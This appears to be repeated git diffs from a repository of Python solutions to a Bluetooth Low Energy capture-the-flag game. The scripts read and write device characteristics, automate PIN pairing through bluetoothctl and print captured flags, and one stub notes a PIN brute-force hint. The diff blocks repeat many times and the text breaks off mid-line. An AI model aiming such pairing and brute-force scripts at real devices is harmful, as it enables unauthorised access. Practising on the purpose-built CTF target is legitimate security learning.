diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions) "exectutes pairing with entered PIN on bluetooth adapter side" try: - + newpid = os.fork() if newpid == 0: + time.sleep(5) ''' Start bluepy stuff ''' @@ -34,7 +35,7 @@ deviceMAC = open('ctf_mac.txt').read() p = btle.Peripheral(deviceMAC) svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb") - print ("Attached to peripheral") + print ("Attached to peripheral (pid 0)") hex1 = p.readCharacteristic(0x2C) hex2 = binascii.b2a_hex(hex1) hexlif2 = str(binascii.unhexlify(hex2)) @@ -42,12 +43,14 @@ p.disconnect() exit() else: + ''' - Start actual pair stuff + Start actual pair stuff ''' subprocess.call(['hciconfig','hci0','sspmode', '0']) # bluetoothctl + print("Pairing") child = pexpect.spawn('bluetoothctl') child.logfile = open("/tmp/mylog", "w") child.expect("#") @@ -63,6 +66,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic @@ -74,6 +79,7 @@ child.sendline(trust_mac) # optionally add device to trusted child.expect('trust succeeded', timeout = 10) pairing_status = True + child.sendline('remove 3c:71:bf:f1:ef:c6') else: # i == 1 print('wrong PIN, retrying if time will allow') except pexpect.EOF: @@ -107,4 +113,4 @@ status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT) if status == True: - print('Pairing successful') \ No newline at end of file + print('Pairing successful') diff --git a/lvl_04.py b/lvl_04.py index 21ede3e..91a4029 100755 --- a/lvl_04.py +++ b/lvl_04.py @@ -93,7 +93,7 @@ #sys.stdout.write(" Response: " + hexstr) # for debugging if(password.strip("0") != hexstr): - print(" Flag: %s" % notificationData.rstrip()) + print("\nFlag: %s" % notificationData.rstrip()) exit() else: gotResponse = True @@ -101,4 +101,4 @@ print "Waiting..." finally: - p.disconnect() \ No newline at end of file + p.disconnect() diff --git a/lvl_07.py b/lvl_07.py index 8b6ae2e..6e56906 100755 --- a/lvl_07.py +++ b/lvl_07.py @@ -46,6 +46,8 @@ child.expect("discoverable on succeeded") child.sendline('default-agent') child.sendline('remove 3c:71:bf:f1:ef:c6') + child.sendline('scan on') + child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3") child.sendline('pair 3c:71:bf:f1:ef:c6') i = child.expect('Paired: yes', timeout = time_limit) @@ -73,7 +75,7 @@ print ("[bp] Attached to peripheral") print("[++] Loading level 07") -hex1 = binascii.unhexlify(str('%0*x' % (4,3))) +hex1 = binascii.unhexlify(str('%0*x' % (4,7))) p.writeCharacteristic(0x30, hex1, withResponse=False) p.disconnect() @@ -96,4 +98,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("[==] Flag: "+hexlif2) p.disconnect() -exit() \ No newline at end of file +exit() diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py new file mode 100644 index 0000000..35a05d5 --- /dev/null +++ b/lvl_08_incomplete.py @@ -0,0 +1,10 @@ +#! /usr/bin/python +import binascii +import struct +import sys, os, time +import bluepy.btle as btle + +''' +42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect + +''' diff --git a/README.md b/README.md index c6f5c90..8eee691 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,10 @@ BLE_CTF_V2 =============== -BLE CTF v2 \ No newline at end of file +BLE CTF v2 (Infinity) + +https://github.com/hackgnar/ble_ctf_infinity + +Thanks @hackgnar for this fun CTF + +I decided I wanted to try to complete this using python, this repo contains my solutions. diff --git a/level_04.py b/level_04.py deleted file mode 100644 index 252cefb..0000000 --- a/level_04.py +++ /dev/null @@ -1,46 +0,0 @@ -#! /usr/bin/python -import binascii -import struct -import sys, os, time -import bluepy.btle as btle - -''' -42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag! -44 0x2C NOTIFY WRITE -46 0x2E READ WRITE write here to goto to scoreboard -''' - -deviceMAC = open('ctf_mac.txt').read() -p = btle.Peripheral(deviceMAC) -svc=p.getServiceByUUID(0x00FF) -print ("Attached to peripheral") - -print("Loading level 04") -hex1 = binascii.unhexlify(str('%0*x' % (4,2))) -p.writeCharacteristic(0x30, hex1, withResponse=False) - -password = "AABBCCDDEEFF" - -sys.stdout.write("\rTrying: %s " % password.rstrip()) -response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True) -while True: - if p.waitForNotifications(1.0): - # handleNotification() was called - continue - print "Waiting..." - - #hex1 = p.readCharacteristic(0x2C) - #hex2 = binascii.b2a_hex(hex1) - #hexlif2 = str(binascii.unhexlify(hex2)) - -class MyDelegate(btle.DefaultDelegate): - def __init__(self, params): - btle.DefaultDelegate.__init__(self) - # ... initialise here - - def handleNotification(self, cHandle, data): - # ... perhaps check cHandle - # ... process 'data' - print("Data: "+data) - -p.disconnect() \ No newline at end of file diff --git a/lvl_01.py b/lvl_01.py index f4046b7..ea6752f 100755 --- a/lvl_01.py +++ b/lvl_01.py @@ -5,7 +5,7 @@ import bluepy.btle as btle ''' -42 0x2A READ goodbye 👋 +42 0x2A READ goodbye fc3fd58dcdad9ab23fac ''' @@ -26,4 +26,4 @@ hexlif2 = str(binascii.unhexlify(hex2)) print("Flag: %s" % hexlif2) -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_02.py b/lvl_02.py index b6665d8..58d3e7a 100755 --- a/lvl_02.py +++ b/lvl_02.py @@ -38,4 +38,4 @@ print "Flag: %s" % hexlif2 break; -p.disconnect() \ No newline at end of file +p.disconnect() diff --git a/lvl_03.py b/lvl_03.py index 8303d8c..1ae79f8 100755 --- a/lvl_03.py +++ b/lvl_03.py @@ -22,9 +22,10 @@ def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - 